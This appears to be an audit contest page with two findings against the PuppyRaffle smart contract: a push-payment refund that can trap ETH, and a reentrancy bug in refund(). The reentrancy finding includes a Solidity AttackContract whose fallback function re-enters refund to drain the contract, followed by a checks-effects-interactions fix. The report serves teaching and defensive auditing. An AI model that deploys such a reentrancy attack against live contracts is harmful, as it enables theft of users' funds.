Push payment in refund traps funds if player contract rejects ETH
Summary
The refund function uses a "push" payment model to send ETH back to the player. If the player is a smart contract that rejects ETH (e.g., lacks a receive() function or explicitly reverts), the transaction fails. This traps the player's funds and leaves their slot marked as "active" in the players array, potentially blocking the raffle from proceeding.
Description
The refund function attempts to send the entrance fee directly to msg.sender using Address.sendValue(). If the recipient contract's receive() function reverts, the entire transaction reverts. Because the state update (players[playerIndex] = address(0)) happens after the ETH transfer, the player's slot remains active. This not only traps the user's funds but also keeps the player count artificially high, which can cause issues during winner selection.
Root Cause
File: src/PuppyRaffle.sol (lines 103-107)
Risk
Severity: Medium
Likelihood: Medium
Impact: Medium
❌ Players using smart contracts cannot get refunds
❌ User funds are permanently trapped
❌ Active player count remains inflated (can cause DoS in
selectWinner)✅ Requires the player to be a contract that rejects ETH
Proof of Concept
Scenario: A user enters the raffle using a smart contract that rejects incoming ETH. When they try to get a refund, the transaction reverts, trapping their funds.
Test Output:
What This Proves:
✅ Push payment fails if recipient rejects ETH
✅ User funds are permanently trapped
✅ Player slot remains active, inflating player count
Recommended Mitigation
Use a "pull" payment model. Store the refund amount in a mapping and let the user withdraw it themselves.
Why This Fixes It:
✅ State updates immediately, removing the player from the active list
✅ User can claim refund at their own convenience
✅ If the claim fails, funds remain in
pendingRefundsand can be retried✅ Prevents fund trapping and player count inflation
References
SWC-113: DoS with Failed Call
Checks-Effects-Interactions pattern
OpenZeppelin Pull Payment pattern
Lead Judging Commences
[H-02] Reentrancy Vulnerability In refund() function
## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.